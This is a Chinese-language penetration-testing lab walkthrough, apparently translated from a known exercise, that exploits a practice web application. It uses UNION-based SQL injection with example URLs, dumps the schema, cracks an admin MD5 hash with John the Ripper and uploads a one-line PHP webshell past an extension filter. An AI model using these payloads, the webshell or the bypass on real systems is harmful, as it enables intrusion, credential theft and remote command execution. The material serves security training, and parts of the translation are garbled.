UNION关键字
UNION语句用于汇集来自两个请求的信息:
SELECT * FROM articles WHERE id=3 UNION SELECT ...
由于它用于从其他表检索信息,因此可以将其用作SQL注入负载。攻击者无法直接修改查询的开头,因为它是由PHP代码生成的。但是,通过使用UNION,攻击者可以操纵查询结束并从其他表检索信息:
SELECT id,name,price FROM articles WHERE id=3 UNION SELECT id,login,password FROM users
最重要的规则是,两条语句都应返回相同的列数,否则数据库将触发错误。
使用UNION开发SQL注入
使用UNION开发SQL注入的步骤如下:
- 查找要执行并集的列数
- 查找页面中回显的列
- 从数据库元表中检索信息
- 从其他表/数据库检索信息
为了通过SQL注入执行请求,需要找到查询第一部分返回的列数。除非你有应用程序的源代码,否则你必须猜测这个数字。
有两种方法可以获取此信息:
- 使用UNION SELECT并增加列数;
- 使用ORDER BY语句。
如果尝试进行联合,并且两个查询返回的列数不同,则数据库将抛出错误:
The used SELECT statements have a different number of columns
可以使用此属性猜测列数。例如,如果可以插入以下查询:
SELECT id,name,price FROM articles where id=1.
您将尝试以下步骤:
- SELECT id,name,price FROM articles where id=1 UNION SELECT 1,
注入1 UNION SELECT 1将返回错误,因为查询的两个子部分中的列数不同;
- SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,
出于与上述相同的原因,有效负载1 UNION SELECT 1,2将返回错误;SELECTid,name,price FROM articles where id=1 UNION SELECT 1,2,3,
因为两个子部分的列数相同,所以此查询不会引发错误。您甚至可以在页面或页面源代码中看到其中一个数字。
注意:这适用于MySQL。其他数据库的方法不同,值为1、2、3…,应更改为null、null、null…对于在UNION关键字的两侧需要相同类型值的数据库。对于Oracle,当使用SELECT时,需要使用关键字FROM,可以使用dual表来完成请求:
UNION SELECT null、null、null FROM dual
另一个方法使用关键字ORDER BY。ORDER BY主要用于告诉数据库应该使用哪个列对结果进行排序:
SELECT firstname,lastname,age,groups FROM users ORDER BY firstname
上面的请求将返回按firstname列排序的用户。
ORDER BY还可以用于与整数一起使用,以告知数据库按列号X排序:
SELECT firstname,lastname,age,groups FROM users ORDER BY 3
上面的请求将返回按第三列排序的用户。
此功能可用于检测列数,如果ORDER BY语句中的列数大于查询中的列数,则会引发错误(例如10):
Unknown column '10' in 'order clause'
可以使用此属性猜测列数。例如,如果可以插入以下查询:SELECT id,name,price FROM articles where id=1;
您可以尝试以下步骤:
- SELECT id,name,price FROM articles where id=1 ORDER BY 5注入1 ORDER BY 5将返回错误,因为查询的第一部分中的列数小于5;
- SELECT id,name,price FROM articles where id=1 ORDER BY 3注入1 ORDER BY 3不会返回错误,因为查询的第一部分中的列数小于或等于3;
- SELECT id,name,price FROM articles where id=1 ORDER BY 4注入ORDER BY 4将返回错误,因为查询的第一部分中的列数小于4;
基于这种二分法搜索,我们知道列数为3,现在可以使用此信息构建最终查询:SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,3即使此方法为本例提供了相同数量的请求,但只要列数增加,它的速度就会显著加快。
正在检索信息
现在我们知道了列的数量,可以从数据库中检索信息了。根据我们收到的错误消息,我们知道使用的后端数据库是MySQL。
使用此信息,我们可以强制数据库执行功能或向我们发送信息:
PHP应用程序使用current_user()连接到数据库的用户
使用version()的数据库版本
为了执行此操作,我们需要将前面语句(UNION SELECT 1,2,3)中的一个值替换为要运行的函数,以便在响应中检索结果。
在尝试检索信息时,请确保始终保持正确的列数。 |
例如,您可以访问以下URL来检索此信息:
- 数据库版本:http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,@@version,3,4
- 当前用户:http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,current_user(),3,4
- 当前数据库:http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,database(),3,4
我们现在可以从数据库中检索信息并检索任意内容。为了检索与当前应用程序相关的信息,我们需要:
- 当前数据库中所有表的名称
- 要从中检索信息的表的列名称
MySQL提供的表包含自MySQL版本5以来可用的数据库、表和列的元信息。我们将使用这些表来检索构建最终请求所需的信息。这些表存储在information_schema中。
以下查询可用于检索:
- 所有表的列表:SELECT table_name FROM information_schema.table;
- 所有列的列表:SELECT column_name FROM information_schema.columns;
通过混合使用这些查询和以前的URL,您可以猜测要访问哪个页面来检索信息:
表格列表:1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables
列列表:1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns
问题是这些请求为您提供了所有表和列的原始列表,但要查询数据库并检索有趣的信息,您需要知道哪些列属于哪个表。希望是表information_schema.columns。列存储表名:
SELECT table_name,column_name FROM information_schema.columns
要检索此信息,我们可以
将tablename和columnname放在注入的不同部分:1 UNION SELECT1, table_name, column_name,4FROM information_schema.columns
使用关键字CONCAT:1 UNION SELECT1,concat(table_name,':', column_name),3,4FROM information_schema.columns. ':'
将tablename和columnname连接在注入的同一部分中,以便能够轻松拆分查询结果。
如果要使用正则表达式轻松地从结果页检索信息(例如,如果要编写SQL注入脚本),可以在注入中使用标记:``1 UNION SELECT 1,concat('^^^',table_name,':',column_name,'^^^') FROM information_schema.columns`。然后很容易在页面中匹配结果。 |
SQL注入提供了与应用程序用于连接到数据库的用户(current_user())...相同的访问级别这就是为什么在部署web应用程序时,为该用户提供尽可能最低的权限总是很重要的原因。
访问管理页面和代码执行破解密码
可以使用两种不同的方法轻松破解密码:
- 搜索引擎
- 开膛手约翰 http://www.openwall.com/john/
当一个散列是不加盐的,它可以很容易地用谷歌这样的搜索引擎破解。为此,只需搜索哈希,您就会看到许多网站上都有您密码的明文版本:
John The Ripper可用于破解此密码,大多数现代Linux发行版都包含John的一个版本,为了破解此密码,您需要告诉John使用了什么算法对其进行加密。对于web应用程序,一个很好的猜测是MD5。
在大多数Linux发行版中,John the Ripper提供的版本只支持少量格式。您可以不带任何参数运行john,从使用信息中获取受支持格式的列表。例如,在Fedora上,支持以下格式:
$ john # ...usage information... --format=NAME force hash type NAME: DES/BSDI/MD5/BF/AFS/LM/crypt # ...usage information...
遗憾的是,可用的MD5不是PHP函数MD5创建的格式。为了破解此密码,我们需要一个支持raw-md5的John版本。主网站上提供的社区增强版支持raw-md5,可以使用。
现在,我们需要以正确的格式为John提供信息,我们需要将用户名和密码放在同一行上,并用冒号 ':'分隔。
admin:8efe310f9ab3efeae8d410a8e0166eb2
可以使用以下命令行破解以前检索到的密码:
$ ./john password --format=raw-md5 --wordlist=dico --rules
使用以下选项:
- password告诉john哪个文件包含密码哈希
- --format=raw-md5告诉john密码哈希是raw-md5格式
- --wordlist=dico告诉john将dico文件用作字典
- --rules告诉john为提供的每个单词尝试变体
John输出与所用格式匹配的哈希数:
Loaded 1 password hash (Raw MD5 [SSE2 16x4x2 (intr)])
这表明使用了正确的格式。
您可以快速检索密码:
$ ./john password --format=raw-md5 --wordlist=dico --rules Loaded 1 password hash (Raw MD5 [SSE2 16x4x2 (intr)]) P4ssw0rd (admin)
上载Webshell和代码执行
一旦获得对管理页面的访问权限,下一个目标就是找到在操作系统上执行命令的方法。
我们可以看到,有一个文件上传功能允许用户上传图片,我们可以使用此功能尝试上传PHP脚本。这个PHP脚本一旦上传到服务器上,将为我们提供一种运行PHP代码和命令的方法。
首先,我们需要创建一个PHP脚本来运行命令。下面是一个简单且最小的webshell的源代码:
<? system($_GET['cmd']); ?>
此脚本获取参数cmd的内容并执行它。它需要保存为扩展名为的file.php,例如:shell.php可用作文件名。
我们现在可以使用页面上提供的上载功能:http://vulnerable/admin/new.php并尝试上载此脚本。
我们可以看到,脚本没有正确上传到服务器上。应用程序阻止扩展名为的文件。要上载的php。但是,我们可以尝试:
.php3将绕过一个简单的过滤器.php
.php。将绕过简单过滤器的测试.php和Apache仍将使用.php,因为在此配置中,它没有用于的处理程序.test
现在,我们需要找到管理上传的PHP脚本将文件放在web服务器上的位置。我们需要确保该文件可直接用于web客户端。我们可以访问新上传图像的网页,查看<img标记指向的位置:< span=""></img标记指向的位置:<>
<divclass="content"> <h2>Lastpicture: Test shell</h2> <divalign="center"> <p> <img src="admin/uploads/shell.php3"alt="Test shell" /> </p> </div> </div>
现在,您可以访问以下地址的页面,并开始使用cmd参数运行命令。例如,访问http://vulnerable/admin/uploads/shell.php3?cmd=uname将在操作系统上运行uname命令并返回当前内核(Linux)。
其他命令可用于检索更多信息:
- cat/etc/passwd获取系统用户的完整列表;
- uname -a获取当前内核的版本;
- ls获取当前目录的内容;
- …
webshell与运行PHP脚本的web服务器具有相同的权限,例如,您将无法检索文件/etc/shadow的内容,因为web服务器无权访问此文件(但是,您仍应尝试,以防管理员出错并更改了此文件的权限)。
每个命令都独立于前一个命令在全新的上下文中运行,您将无法通过运行/etc/shadow和ls来获取/etc/目录的内容.
结论
本练习向您展示了如何手动检测和利用SQL注入来访问管理页面。一旦进入“受信任区域”,通常会有更多的功能可用,这可能会导致更多的漏洞。
此练习基于几年前在一个网站上进行的渗透测试的结果,但具有此类漏洞的网站今天仍然可以在互联网上找到。
所提供的web服务器的配置是一种理想的情况,因为会显示错误消息,并且关闭PHP保护。我们将在另一个练习中看到如何在更困难的条件下利用SQL注入,但与此同时,您可以使用PHP配置来强化练习。为此,您需要启用magic_quotes_gpc并禁用PHP配置中的display_errors错误(/etc/php5/apache2/php.ini),然后重新启动web服务器(/etc/init.d/apache2 restart)
